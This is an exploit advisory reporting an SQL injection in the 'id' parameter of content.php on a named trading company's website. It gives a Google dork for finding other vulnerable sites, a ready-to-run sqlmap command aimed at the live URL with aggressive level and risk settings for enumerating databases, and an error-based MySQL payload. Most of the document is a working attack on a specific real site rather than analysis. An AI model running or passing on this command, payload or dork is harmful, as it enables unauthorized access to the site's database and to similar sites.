****************************
#Exploit Title: HIMALAYA - SQL Injection vulnerability
#Date: 2020-08-27
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://himalaya-trading.com
#Google Dork: content.php?id=
#Tested On: windows 10
sqlmap:
sqlmap -u "http://himalaya-trading.com/content.php?Id=3" --level=5 --risk=3 --dbs --random-agent
Testing Method;
- error-based
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: Id=3 AND GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT (ELT(6063=6063,1))),0x717a627871),6063)
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************